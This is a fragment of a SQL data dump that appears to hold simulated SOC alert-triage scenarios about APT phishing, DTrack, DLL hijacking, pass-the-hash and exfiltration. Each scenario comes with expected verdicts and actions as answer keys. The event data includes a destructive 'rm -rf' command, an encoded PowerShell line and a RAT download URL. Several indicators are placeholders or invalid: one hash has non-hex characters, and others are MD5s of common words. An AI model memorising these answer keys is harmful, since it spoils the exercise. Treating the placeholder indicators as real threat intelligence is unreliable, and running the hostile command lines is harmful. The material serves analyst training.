account.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Not a file hash: this value is the hashed_password field of the event and is the unsalted MD5 of the string abc123, so a file-reputation lookup is meaningless. Treat it as a leaked weak credential for gamer123 (reset the password and review NTLM use); the file-hash candidate for block_hash in this event is related_hash f3c6c09f0c3e3c4b1ee2f6f9c5e8f9df.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"shadowpad.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis 
Report\",\"verdict\":\"malicious\",\"details\":\"Filename linked with ShadowPad backdoor.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Identity\",\"evidence\":{\"user\":{\"username\":\"jdoe\",\"display_name\":\"John Doe\",\"department\":\"Finance\",\"manager\":\"Jane Smith\"},\"risk_score\":85,\"recent_activity\":[{\"action\":\"Login Success\",\"ip\":\"10.0.0.5\",\"location\":\"New York, US\",\"time\":\"09:00 AM\"},{\"action\":\"Password Reset Request\",\"ip\":\"192.168.1.5\",\"location\":\"New York, US\",\"time\":\"09:05 AM\"},{\"action\":\"Login Failed\",\"ip\":\"203.0.113.99\",\"location\":\"Moscow, RU\",\"time\":\"02:00 AM\",\"flag\":true}]}}', 0),
(490, 'Data Exfiltration and Command Execution', 'critical', 'Network traffic analysis', 'APT41 has successfully exfiltrated sensitive data from the network and executed remote commands using an established backdoor. This action aligns with their known TTPs, causing significant damage to the compromised systems.', 'Data Theft', 'T1041 - Exfiltration Over Command and Control Channel', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T14:45:00Z\",\"src_ip\":\"192.168.1.105\",\"dst_ip\":\"203.0.113.45\",\"src_port\":8080,\"dst_port\":443,\"protocol\":\"TCP\",\"username\":\"jdoe\",\"file_exfil\":{\"filename\":\"confidential_data.zip\",\"hash\":\"5d41402abc4b2a76b9719d911017c592\"},\"command_executed\":\"rm -rf /sensitive_data/*\",\"malware_name\":\"Backdoor.APT41\",\"external_command_control\":\"203.0.113.45\"}', '2026-01-05 03:26:48', '2026-02-16 18:20:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host involved in data exfiltration.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known APT41 command and control server.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with exfiltrated data.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"suspicious\",\"details\":\"Sensitive file exfiltrated by attacker.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active 
Directory\",\"verdict\":\"internal\",\"details\":\"Compromised user account used for exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(491, 'Suspicious Email Attachment Detected', 'high', 'Email Gateway Logs', 'A spear-phishing email was detected targeting a key personnel in a South Korean defense firm. The email contains a malicious attachment disguised as a procurement request.', 'Initial Access', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-03T08:45:23Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.10.5.23\",\"destination_email\":\"j.smith@defensecorp.kr\",\"attachment_name\":\"Procurement_Request_2023.docx\",\"attachment_hash\":\"e2fc714c4727ee9395f324cd2e7f331f\",\"subject\":\"Urgent: Procurement Request\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36\"}', '2026-01-05 04:01:18', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known phishing campaigns targeting defense sectors.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.10.5.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the targeted user.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"j.smith@defensecorp.kr\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"clean\",\"details\":\"Email address of a key personnel at the targeted company.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Procurement_Request_2023.docx\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis\",\"verdict\":\"malicious\",\"details\":\"File contains active macro that downloads additional 
payloads.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"e2fc714c4727ee9395f324cd2e7f331f\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malware used in spear-phishing campaigns.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Email Attachment Detected\",\"date\":\"2026-02-01T20:32:19.102Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(492, 'Execution of DTrack Payload', 'high', 'Endpoint Detection and Response (EDR)', 'Upon opening the malicious attachment, a macro executes, downloading the DTrack payload onto the victim\'s machine, marking the next phase of the attack.', 'Execution', 'T1204: User Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_id\":\"4624\",\"user\":\"jdoe\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.1.1.15\",\"file_created\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\DTrackPayload.exe\",\"file_hash\":\"d4e5f6a7b8c9d0e1f2g3h4i5j6k7l8m9\",\"process_name\":\"macro_loader.exe\",\"process_command_line\":\"macro_loader.exe -d C:\\\\Users\\\\jdoe\\\\Documents\\\\malicious.docm\",\"process_id\":\"6789\",\"parent_process\":\"WINWORD.EXE\",\"parent_process_id\":\"1234\"}', '2026-01-05 04:01:18', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known command and control server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d4e5f6a7b8c9d0e1f2g3h4i5j6k7l8m9\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"DTrack malware sample\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"DTrackPayload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection and Response\",\"verdict\":\"suspicious\",\"details\":\"Unusual execution detected\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"clean\",\"details\":\"Valid user 
account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(493, 'Establishing Persistence with DLL Hijacking', 'high', 'System Logs', 'The attackers utilize DLL hijacking techniques to embed DTrack into legitimate processes, allowing them to maintain a foothold within the network.', 'Persistence', 'T1574.001 - DLL Search Order Hijacking', 1, 'new', NULL, '{\"event_id\":4624,\"timestamp\":\"2023-10-15T14:32:00Z\",\"computer_name\":\"compromised-host.local\",\"user_name\":\"compromised_user\",\"source_ip\":\"203.0.113.5\",\"destination_ip\":\"10.0.0.12\",\"process_name\":\"C:\\\\Program Files\\\\LegitApp\\\\LegitApp.exe\",\"injected_dll\":\"C:\\\\Windows\\\\System32\\\\hijacked.dll\",\"malware_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"event_description\":\"DLL hijacking detected in LegitApp.exe with injected DLL hijacked.dll\"}', '2026-01-05 04:01:18', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with DTrack malware\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"C:\\\\Program Files\\\\LegitApp\\\\LegitApp.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"malicious\",\"details\":\"DLL used for persistence by malware\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.104Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":4624,\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user_name\\\":\\\"compromised_user\\\",\\\"source_ip\\\":\\\"203.0.113.5\\\",\\\"destination_ip\\\":\\\"10.0.0.12\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\LegitApp\\\\\\\\LegitApp.exe\\\",\\\"injected_dll\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\hijacked.dll\\\",\\\"malware_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"event_description\\\":\\\"DLL hijacking detected in LegitApp.exe with injected DLL hijacked.dll\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.104Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":4624,\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user_name\\\":\\\"compromised_user\\\",\\\"source_ip\\\":\\\"203.0.113.5\\\",\\\"destination_ip\\\":\\\"10.0.0.12\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\LegitApp\\\\\\\\LegitApp.exe\\\",\\\"injected_dll\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\hijacked.dll\\\",\\\"malware_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"event_description\\\":\\\"DLL hijacking detected in LegitApp.exe with injected DLL hijacked.dll\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.104Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":4624,\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user_name\\\":\\\"compromised_user\\\",\\\"source_ip\\\":\\\"203.0.113.5\\\",\\\"destination_ip\\\":\\\"10.0.0.12\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\LegitApp\\\\\\\\LegitApp.exe\\\",\\\"injected_dll\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\hijacked.dll\\\",\\\"malware_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"event_description\\\":\\\"DLL hijacking detected in LegitApp.exe with injected DLL hijacked.dll\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.104Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":4624,\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user_name\\\":\\\"compromised_user\\\",\\\"source_ip\\\":\\\"203.0.113.5\\\",\\\"destination_ip\\\":\\\"10.0.0.12\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\LegitApp\\\\\\\\LegitApp.exe\\\",\\\"injected_dll\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\hijacked.dll\\\",\\\"malware_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"event_description\\\":\\\"DLL hijacking detected in LegitApp.exe with injected DLL hijacked.dll\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.104Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":4624,\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user_name\\\":\\\"compromised_user\\\",\\\"source_ip\\\":\\\"203.0.113.5\\\",\\\"destination_ip\\\":\\\"10.0.0.12\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Program 
Files\\\\\\\\LegitApp\\\\\\\\LegitApp.exe\\\",\\\"injected_dll\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\hijacked.dll\\\",\\\"malware_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"event_description\\\":\\\"DLL hijacking detected in LegitApp.exe with injected DLL hijacked.dll\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(494, 'Lateral Movement Detected via Pass-the-Hash', 'high', 'Network Traffic Analysis', 'An attacker has been detected moving laterally across the network using Pass-the-Hash technique. The attacker used stolen credentials to access multiple internal systems, searching for sensitive schematics related to tank and laser weaponry.', 'Lateral Movement', 'T1075', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"event_type\":\"network_connection\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"username\":\"internal_user1\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"file_accessed\":\"tank_schematics_v3.pdf\",\"action\":\"login_success\",\"protocol\":\"SMB\",\"destination_ports\":[445,139],\"note\":\"Suspicious access pattern detected using Pass-the-Hash.\"}', '2026-01-05 04:01:18', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT group activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Inventory\",\"verdict\":\"internal\",\"details\":\"Internal asset, department: R&D\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"internal_user1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Security Logs\",\"verdict\":\"suspicious\",\"details\":\"Account used in abnormal access pattern.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hash Database\",\"verdict\":\"suspicious\",\"details\":\"Potential credential dump hash.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(495, 'Exfiltration of Sensitive Schematics', 'critical', 'Data Loss Prevention (DLP) Logs', 'The attackers have successfully exfiltrated sensitive defense schematics using encrypted channels. This marks the final stage of their espionage mission.', 'Exfiltration', 'T1048: Exfiltration Over Alternative Protocol', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-10T03:45:27Z\",\"event_type\":\"data_exfiltration\",\"source_ip\":\"10.0.5.23\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"TLS\",\"file_sha256\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"filename\":\"sensitive_schematics_v5.pdf\",\"user\":\"jdoe_internal\",\"outbound_channel\":\"encrypted_tunnel\",\"actions_taken\":[\"file_transfer\"],\"status\":\"completed\"}', '2026-01-05 04:01:18', '2026-02-16 18:19:30', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT group\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known exfiltration tool\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"sensitive_schematics_v5.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal DLP\",\"verdict\":\"internal\",\"details\":\"Classified document\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe_internal\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User credentials possibly compromised\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.107Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T03:45:27Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"TLS\\\",\\\"file_sha256\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"filename\\\":\\\"sensitive_schematics_v5.pdf\\\",\\\"user\\\":\\\"jdoe_internal\\\",\\\"outbound_channel\\\":\\\"encrypted_tunnel\\\",\\\"actions_taken\\\":[\\\"file_transfer\\\"],\\\"status\\\":\\\"completed\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.107Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T03:45:27Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"TLS\\\",\\\"file_sha256\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"filename\\\":\\\"sensitive_schematics_v5.pdf\\\",\\\"user\\\":\\\"jdoe_internal\\\",\\\"outbound_channel\\\":\\\"encrypted_tunnel\\\",\\\"actions_taken\\\":[\\\"file_transfer\\\"],\\\"status\\\":\\\"completed\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.107Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T03:45:27Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"TLS\\\",\\\"file_sha256\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"filename\\\":\\\"sensitive_schematics_v5.pdf\\\",\\\"user\\\":\\\"jdoe_internal\\\",\\\"outbound_channel\\\":\\\"encrypted_tunnel\\\",\\\"actions_taken\\\":[\\\"file_transfer\\\"],\\\"status\\\":\\\"completed\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.107Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T03:45:27Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"TLS\\\",\\\"file_sha256\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"filename\\\":\\\"sensitive_schematics_v5.pdf\\\",\\\"user\\\":\\\"jdoe_internal\\\",\\\"outbound_channel\\\":\\\"encrypted_tunnel\\\",\\\"actions_taken\\\":[\\\"file_transfer\\\"],\\\"status\\\":\\\"completed\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.107Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T03:45:27Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"TLS\\\",\\\"file_sha256\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"filename\\\":\\\"sensitive_schematics_v5.pdf\\\",\\\"user\\\":\\\"jdoe_internal\\\",\\\"outbound_channel\\\":\\\"encrypted_tunnel\\\",\\\"actions_taken\\\":[\\\"file_transfer\\\"],\\\"status\\\":\\\"completed\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(496, 'Suspicious Domain Access Detected', 'medium', 'Firewall Logs', 'The attackers initiated their campaign by accessing a compromised domain to deliver the Matryoshka RAT to the ministry\'s network, marking the beginning of their infiltration.', 'Initial Access', 'T1071.001 - Application Layer Protocol: Web Protocols', 1, 'resolved', 34, '{\"timestamp\":\"2023-10-25T14:23:45Z\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.0.5.23\",\"dst_port\":\"80\",\"protocol\":\"HTTP\",\"domain\":\"compromise-domain.example.com\",\"url\":\"http://compromise-domain.example.com/matryoshka_rat.exe\",\"hash\":\"b1946ac92492d2347c6235b4d2611184\",\"filename\":\"matryoshka_rat.exe\",\"action\":\"allowed\"}', '2026-01-05 04:03:10', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intel Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activity.\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"compromise-domain.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"OpenDNS\",\"verdict\":\"malicious\",\"details\":\"Domain used for malware distribution.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches Matryoshka RAT sample.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"matryoshka_rat.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename associated with Matryoshka RAT.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Beginner', 'TI', 1, 0, NULL, NULL, 
